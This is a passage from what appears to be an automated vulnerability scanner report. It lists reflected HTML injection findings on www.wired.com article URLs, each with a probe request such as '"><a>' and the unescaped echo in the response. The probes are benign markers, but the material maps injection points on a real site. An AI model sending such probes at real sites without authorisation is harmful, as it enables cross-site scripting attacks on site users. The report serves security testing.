GET /science/discoveries/newscf412"><a>cb3677366bf/2007/10/dayintech_1010 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newscf412"><a>cb3677366bf">
...[SNIP]...

1.677. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa58"><a>4fd1e10ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science1aa58"><a>4fd1e10ab82/discoveries/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:34 GMT
Date: Sun, 21 Nov 2010 23:09:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1aa58"><a>4fd1e10ab82 ss_discoveries c_news">
...[SNIP]...

1.678. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e2b"><a>c26500463e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries68e2b"><a>c26500463e9/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:00 GMT
Date: Sun, 21 Nov 2010 23:10:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries68e2b"><a>c26500463e9 c_news">
...[SNIP]...

1.679. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1105

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106cc"><a>40e21ea45df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news106cc"><a>40e21ea45df/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news106cc"><a>40e21ea45df">
...[SNIP]...

1.680. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3f5"><a>0ed0fcf84fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science2b3f5"><a>0ed0fcf84fd/discoveries/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:30 GMT
Date: Sun, 21 Nov 2010 23:09:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2b3f5"><a>0ed0fcf84fd ss_discoveries c_news">
...[SNIP]...

1.681. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad12b"><a>fc633443f33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesad12b"><a>fc633443f33/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:53 GMT
Date: Sun, 21 Nov 2010 23:09:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesad12b"><a>fc633443f33 c_news">
...[SNIP]...

1.682. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1112

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483e8"><a>03a3277457 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news483e8"><a>03a3277457/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:11 GMT
Date: Sun, 21 Nov 2010 23:10:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news483e8"><a>03a3277457">
...[SNIP]...

1.683. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf3d"><a>d84d2d33c95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecdf3d"><a>d84d2d33c95/discoveries/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:26 GMT
Date: Sun, 21 Nov 2010 23:09:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecdf3d"><a>d84d2d33c95 ss_discoveries c_news">
...[SNIP]...

1.684. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c14"><a>76302bf60a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese5c14"><a>76302bf60a4/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:49 GMT
Date: Sun, 21 Nov 2010 23:09:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese5c14"><a>76302bf60a4 c_news">
...[SNIP]...

1.685. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1119

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b016"><a>8b57ac5dea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news4b016"><a>8b57ac5dea6/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news4b016"><a>8b57ac5dea6">
...[SNIP]...

1.686. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab"><a>01007bb9cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science9d4ab"><a>01007bb9cc7/discoveries/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:37 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science9d4ab"><a>01007bb9cc7 ss_discoveries c_news">
...[SNIP]...

1.687. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a068"><a>8c766f25078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries5a068"><a>8c766f25078/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:03 GMT
Date: Sun, 21 Nov 2010 23:10:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries5a068"><a>8c766f25078 c_news">
...[SNIP]...

1.688. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1127 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/dayintech_1127

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d5e"><a>47d8c564ba0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news70d5e"><a>47d8c564ba0/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news70d5e"><a>47d8c564ba0">
...[SNIP]...

1.689. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f65"><a>a1751845344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science58f65"><a>a1751845344/discoveries/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:23 GMT
Date: Sun, 21 Nov 2010 23:09:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science58f65"><a>a1751845344 ss_discoveries c_news">
...[SNIP]...

1.690. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995c5"><a>fe13073f8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries995c5"><a>fe13073f8eb/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries995c5"><a>fe13073f8eb c_news">
...[SNIP]...

1.691. http://www.wired.com/science/discoveries/news/2007/11/wiredscience [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/11/wiredscience

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9994"><a>6e128528801 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newse9994"><a>6e128528801/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
